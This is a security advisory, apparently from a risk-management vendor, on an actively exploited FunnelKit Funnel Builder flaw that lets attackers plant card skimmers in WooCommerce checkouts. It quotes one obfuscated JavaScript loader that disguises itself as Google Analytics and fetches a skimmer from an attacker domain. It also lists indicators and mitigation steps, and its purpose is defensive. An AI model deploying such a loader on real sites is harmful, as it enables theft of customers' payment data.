Executive Summary
A critical unauthenticated vulnerability in the Funnel Builder plugin by FunnelKit for WordPress is under active exploitation, enabling sophisticated threat actors to inject malicious JavaScript into WooCommerce checkout pages. This flaw, present in all versions of Funnel Builder prior to 3.15.0.3, allows attackers to deploy advanced payment card skimmers, resulting in the theft of credit card numbers, CVVs, billing addresses, and other sensitive customer data. The attack leverages a lack of permission checks on a public endpoint, affecting over 40,000 e-commerce sites globally. The exploitation is ongoing, with evidence of widespread compromise and data exfiltration to attacker-controlled infrastructure. Immediate patching and forensic review are strongly advised.
Threat Actor Profile
The exploitation campaign exhibits strong alignment with the tactics, techniques, and procedures (TTPs) of Magecart-style cybercriminal groups, notorious for targeting e-commerce platforms with web skimming malware. These actors are financially motivated, highly skilled in obfuscation, and adept at leveraging supply chain vulnerabilities in popular plugins such as Funnel Builder. The attackers utilize infrastructure mimicking legitimate analytics services, such as spoofed Google Analytics or Tag Manager domains, to evade detection and maximize dwell time. While no specific advanced persistent threat (APT) group has been formally attributed, the operational sophistication and monetization strategy are consistent with established Magecart collectives.
Technical Analysis of Malware/TTPs
The vulnerability in Funnel Builder arises from an unauthenticated arbitrary option update flaw. Specifically, the plugin exposes a public checkout endpoint that, in versions prior to 3.15.0.3, lacks adequate permission checks and method restrictions. This allows remote attackers to invoke internal methods and write arbitrary data into the plugin’s global settings.
Attackers exploit this by injecting JavaScript into the “External Scripts” configuration. The injected code is executed on every WooCommerce checkout page, enabling real-time skimming of payment data. The malicious payload is typically obfuscated and masquerades as a legitimate analytics script. For example, observed payloads use base64-encoded URLs and asynchronous script loading to fetch secondary JavaScript from attacker-controlled domains such as analytics-reports[.]com.
A representative payload observed in the wild is as follows:
(function(i, s, o, g, r) {
window.addEventListener("load", function() {
a = s.createElement(o);
a.async = 1;
a.src = atob(r);
s.body.appendChild(a);
});
})(window, document, "script", "www.google-analytics.com/analytics.js", "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM=");
The base64 string decodes to https://analytics-reports[.]com/wss/jquery-lib.js, which loads a secondary script establishing a WebSocket connection to wss://protect-wss[.]com/ws. Through this channel, a customized skimmer is streamed to the victim’s browser, capturing and exfiltrating payment data in real time.
Key technical indicators include the presence of unfamiliar scripts in the FunnelKit “External Scripts” setting, especially those referencing non-Google domains, and outbound WebSocket connections to suspicious endpoints. The malware is highly evasive, leveraging legitimate-looking domains and asynchronous loading to bypass traditional security controls.
Exploitation in the Wild
The vulnerability was first identified and reported by Sansec, a leading e-commerce security research firm, which observed active exploitation across thousands of WooCommerce stores. The attack pattern closely mirrors previous Magecart campaigns, with skimmers disguised as analytics scripts and rapid deployment across vulnerable sites.
Victim sites are typically compromised via automated scanning and exploitation of the vulnerable endpoint, followed by injection of the skimmer payload. The attackers then harvest payment data from unsuspecting customers during the checkout process. Stolen data is exfiltrated via WebSocket to attacker infrastructure and is believed to be monetized through dark web carding markets.
The scale of exploitation is significant, with over 40,000 sites at risk and confirmed incidents of data theft. The attack is global in scope, affecting e-commerce operators in all regions where WooCommerce and Funnel Builder are deployed.
Victimology and Targeting
The primary targets are e-commerce businesses operating WordPress sites with the Funnel Builder plugin installed, particularly those running versions prior to 3.15.0.3. The attack is indiscriminate, affecting small businesses and large retailers alike, with no evidence of sector-specific or geographic targeting. The common denominator is the use of the vulnerable plugin in conjunction with WooCommerce checkout functionality.
Victims include online merchants processing credit card payments, with customer data at risk during the checkout process. The impact extends to end customers, whose payment information may be stolen and subsequently used for fraudulent transactions or sold on underground markets.
Mitigation and Countermeasures
Immediate action is required to mitigate this threat. All organizations using Funnel Builder must update to version 3.15.0.3 or later via the WordPress dashboard. After patching, administrators should review the FunnelKit “External Scripts” setting under Settings > Checkout and remove any unfamiliar or suspicious scripts, particularly those referencing non-Google domains.
A comprehensive malware scan should be conducted using reputable tools such as Sansec eComscan or equivalent, to detect and remove any residual skimmers or backdoors. It is also recommended to review web server logs for evidence of unauthorized option updates or suspicious HTTP requests to the public checkout endpoint.
The vendor patch introduces robust permission checks and restricts the vulnerable endpoint to an allow-list of safe methods, effectively closing the attack vector. Ongoing monitoring for indicators of compromise, such as outbound connections to analytics-reports[.]com or protect-wss[.]com, is advised.
Organizations should also consider implementing web application firewalls (WAFs) with rules to block known malicious domains and enhance monitoring of checkout page scripts. Regular plugin updates and security reviews are essential to prevent future exploitation.
References
BleepingComputer: Funnel Builder WordPress plugin bug exploited to steal credit cards https://www.bleepingcomputer.com/news/security/funnel-builder-wordpress-plugin-bug-exploited-to-steal-credit-cards/
Sansec Research: Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts https://sansec.io/research/funnelkit-woocommerce-vulnerability-exploited
Sansec LinkedIn Advisory https://www.linkedin.com/posts/sansec_a-critical-vulnerability-in-funnel-builder-activity-7460783153562132480-ttT7
WPScan Vulnerability Entry https://wpscan.com/vulnerability/d553cff4-074a-44e7-aebe-e61c86ab8042/
Wordfence Threat Intelligence https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/funnel-builder/funnelkit-funnel-builder-for-woocommerce-checkout-31501-unauthenticated-sql-injection
Reddit Discussion https://www.reddit.com/r/cybersecurity/comments/1tesp1q/funnel_builder_wordpress_plugin_bug_exploited_to/
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our platform empowers security teams to identify vulnerabilities, track emerging threats, and ensure compliance with industry best practices. For more information or to discuss your organization’s security posture, we are happy to answer questions at ops@rescana.com.
